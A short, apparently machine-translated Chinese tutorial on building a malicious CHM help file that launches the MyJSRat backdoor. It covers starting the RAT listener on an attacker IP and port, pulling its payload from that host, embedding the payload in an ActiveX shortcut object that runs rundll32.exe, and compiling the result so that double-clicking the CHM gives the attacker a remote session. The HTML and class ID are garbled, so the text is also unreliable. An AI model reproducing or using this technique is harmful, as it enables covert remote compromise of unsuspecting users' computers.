MyJSRat结合CHM命令执行
MyJSRat
myjsrat是jsbackdoor的Python版本下载地址:https://github.com/ridter/myjsrat
Easy CHM
CHM是用英语编译的帮助手册的缩写,即“编译帮助文件”。 CHM是微软的新一代帮助文件格式。它使用html作为源文本来编译和存储类似数据库的形式的帮助内容。步骤
下载 MyJSRat 并运行
1git克隆https://github.com/ridter/myjsrat
1
python myjsrat.py -i ipaddr -p端口
下载 wtf 文件
浏览器访问https://IPADDR
ORT/WTF并将其保存到TXT文件
将上面保存的代码写入到如下代码的 Item1 的 Value 值中
注意:要在rundll32.exe之前和之后添加,1
!doctype htmlhtmlheadtitlemousejack重播/title head/headbodyCommand exec obsec id=x classID='clSID3:ADB880A6-d8ff-11cf-9377-00aaaaaaaa 00aaaaaaaaaaaaa 003b7a11'width value='bitmap3:shortcut'param name='item1'value=',rundll32.exe,'param name='item2'value='273,1,1'/objectscriptx.click()
保存为 HTML 文件
创建一个新目录,然后将上述代码保存在新文件夹中通过 EasyCHM 制作 CHM 文件
compile exp.html文件通过Easychm
双击上线
此时,只需双击test.chm文件,您就可以在线上